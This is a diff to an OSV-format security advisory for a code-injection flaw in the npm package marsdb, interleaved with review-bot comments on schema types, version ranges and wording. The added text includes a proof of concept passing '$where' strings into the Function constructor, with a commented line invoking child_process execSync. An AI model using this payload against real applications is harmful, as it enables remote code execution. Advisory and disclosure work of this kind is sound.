@@ -1,12 +1,17 @@
{
"schema_version": "1.4.0",
"id": "GHSA-5mrr-rgp6-x4gr",
"modified": "2020-08-31T18:48:01Z",
"modified": "2023-01-09T05:03:48Z",
"published": "2020-09-03T19:39:05Z",
"aliases": [],
"summary": "Command Injection in marsdb",
"details": "All versions of `marsdb` are vulnerable to Command Injection. In the `DocumentMatcher` class, selectors on `$where` clauses are passed to a Function constructor unsanitized. This allows attackers to run arbitrary commands in the system when the function is executed.\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.",
"severity": [],
"summary": "[Security] Arbitrary Code Execution via unsanitized $where selector (GHSA-5mrr-rgp6-x4gr)",
"details": "The $where query selector in marsdb passes user-supplied strings directly \nto the Function() constructor without any sanitization or validation.\n\nVulnerable code in dist/DocumentMatcher.js, line 419:\n selectorValue = Function('obj', 'return ' + selectorValue);\n\nThis allows arbitrary JavaScript execution in the application context.\nOn Node.js <= 18 (typical production environments), this escalates to \nfull Remote Code Execution via require('child_process').\n\n## Proof of Concept\n\n```js\nconst Collection = require('marsdb').default;\nconst col = new Collection('users');\ncol.insert({ name: 'alice' });\n\n// Authentication bypass\ncol.find({ $where: \"1 === 1\" }).then(result => {\n console.log('Filter bypassed:', result);\n});\n\n// Full RCE on Node.js <= 18:\n// col.find({\n// $where: \"require('child_process').execSync('whoami').toString()\"\n// });\n```\n\nDiscovered using vulnscope - AI-assisted OSS vulnerability scanner\nhttps://github.com/msh0625/vulnscope",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
"affected": [
{
"package": {
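Review bot: the rewritten "details" drops the original "## Recommendation" section ("No fix is currently available. Consider using an alternative package until a fix is made available.") without replacing it; an advisory with no fixed version still needs a remediation statement, so restore that section after the new description. Two further points on the same hunk: the new "summary" embeds a "[Security]" prefix and the GHSA id, both of which duplicate the "id" field and are not part of the summary in the rest of the database, so a plain "Arbitrary code execution via unsanitized $where selector in marsdb" reads better; and the claim "On Node.js <= 18 (typical production environments), this escalates to full Remote Code Execution" gives no reason for the version bound, so either state what changes after 18 or drop the qualifier. The citation "dist/DocumentMatcher.js, line 419" points into a built artifact whose line numbers move between releases; citing the source file or a pinned commit would be stable. The trailing "Discovered using vulnscope" link is tool attribution rather than advisory content and belongs in "credits" or the PR description, not in "details".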
Expand All @@ -18,7 +23,10 @@
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0.0.0"
"introduced": "0"
},
{
"last_affected": "0.6.10"
}
]
}
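Review bot: changing "introduced" from "0.0.0" to "0" is correct (that is the conventional "all versions" marker), but adding "last_affected": "0.6.10" narrows a range the advisory text still describes as "All versions" with no fix available; any version published after 0.6.10 would then be reported as unaffected until someone updates this file. Please confirm 0.6.10 is the latest version on npm at the time of this change and either note that in the PR or leave the range open-ended until a fixed release exists, in which case a "fixed" event would replace "last_affected".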
Expand All @@ -30,14 +38,19 @@
"type": "WEB",
"url": "https://github.com/bkimminich/juice-shop/issues/1173"
},
{
"type": "PACKAGE",
"url": "https://github.com/c58/marsdb/blob/master/dist/DocumentMatcher.js"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1122"
}
],
"database_specific": {
"cwe_ids": [
"CWE-77"
"CWE-77",
"CWE-94"
],
"severity": "CRITICAL",
"github_reviewed": true,
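Review bot: the new reference with "type": "PACKAGE" points at a single file, "https://github.com/c58/marsdb/blob/master/dist/DocumentMatcher.js"; in the OSV schema PACKAGE denotes the package's home page, so this entry should be typed "WEB" (or "EVIDENCE"), and the URL should be pinned to a commit rather than "master" so the cited line survives future pushes. The "https://www.npmjs.com/advisories/1122" entry is an advisory page and fits "type": "ADVISORY" better than "WEB". Adding "CWE-94" alongside "CWE-77" is consistent with the new summary, since passing a string to the Function constructor is code injection rather than OS command injection; if only one is kept, CWE-94 is the accurate one.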